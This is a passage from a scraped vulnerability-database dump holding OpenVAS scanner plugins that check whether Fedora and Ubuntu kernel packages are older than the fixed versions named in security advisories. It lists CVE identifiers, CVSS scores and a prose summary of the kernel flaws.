script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-14747\");\n script_cve_id(\"CVE-2011-1161\", \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\",\n \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\",\n \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\",\n \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\",\n \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\",\n \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\",\n \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-3638\");\n script_name(\"Fedora Update for kernel FEDORA-2011-14747\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~100.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:12", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1000-1", "cvss3": {}, "published": "2010-10-22T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1000-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-2248", "CVE-2010-2226", "CVE-2010-2960", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-2521", "CVE-2010-3477", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-3067", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-3080", "CVE-2010-3432"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840523", "href": "http://plugins.openvas.org/nasl.php?oid=840523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1000_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Joel Becker discovered that OCFS2 did not correctly validate on-disk\n symlink structures. If an attacker were able to trick a user or automated\n system into mounting a specially crafted filesystem, it could crash the\n system or exposde kernel memory, leading to a loss of privacy. (Ubuntu\n 6.06 LTS, 8.04 LTS, and 9.04 were not affected.)\n\n Al Viro discovered a race condition in the TTY driver. A local attacker\n could exploit this to crash the system, leading to a denial of service.\n (Only Ubuntu 9.04 and 9.10 were affected.) (CVE-2009-4895)\n \n Dan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly\n check file permissions. A local attacker could overwrite append-only\n files, leading to potential data loss. (Only Ubuntu 9.10 was affected.)\n (CVE-2010-2066)\n \n Dan Rosenberg discovered that the swapexit xfs ioctl did not correctly\n check file permissions. A local attacker could exploit this to read from\n write-only files, leading to a loss of privacy. (Only Ubuntu 8.04 LTS,\n 9.04, and 9.10 were affected.) (CVE-2010-2226)\n \n Suresh Jayaraman discovered that CIFS did not correctly validate certain\n response packats. A remote attacker could send specially crafted traffic\n that would crash the system, leading to a denial of service. (Ubuntu\n 10.04 LTS and 10.10 were not affected.) (CVE-2010-2248)\n \n Ben Hutchings discovered that the ethtool interface did not correctly\n check certain sizes. A local attacker could perform malicious ioctl calls\n that could crash the system, leading to a denial of service. (Only Ubuntu\n 9.10 and 10.04 LTS were affected.) (CVE-2010-2478, CVE-2010-3084)\n \n James Chapman discovered that L2TP did not correctly evaluate checksum\n capabilities. If an attacker could make malicious routing changes, they\n could crash the system, leading to a denial of service. (Only Ubuntu\n 9.10 was affected.) (CVE-2010-2495)\n \n Neil Brown discovered that NFSv4 did not correctly check certain write\n requests. A remote attacker could send specially crafted traffic that\n could crash the system or possibly gain root privileges. (Ubuntu 10.04\n LTS and 10.10 were not affected.) (CVE-2010-2521)\n \n David Howells discovered that DNS resolution in CIFS could be spoofed. A\n local attacker could exploit this to control DNS replies, leading to\n a loss of privacy and possible privilege escalation. (Only Ubuntu 9.10\n was affected.) (CVE-2010-2524)\n \n Bob Peterson discovered that GFS2 rename operations did not correctly\n validate certain sizes. A local a ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\";\n\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\n\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1000-1/\");\n script_id(840523);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-22 16:42:09 +0200 (Fri, 22 Oct 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1000-1\");\n script_cve_id(\"CVE-2009-4895\", \"CVE-2010-2066\", \"CVE-2010-2226\", \"CVE-2010-2248\", \"CVE-2010-2478\", \"CVE-2010-2495\", \"CVE-2010-2521\", \"CVE-2010-2524\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2946\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2963\", \"CVE-2010-3015\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3080\", \"CVE-2010-3084\", \"CVE-2010-3310\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3705\", \"CVE-2010-3904\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crc-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext2-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext3-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"jfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"loop-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-firmware-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ntfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"reiserfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ufs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n 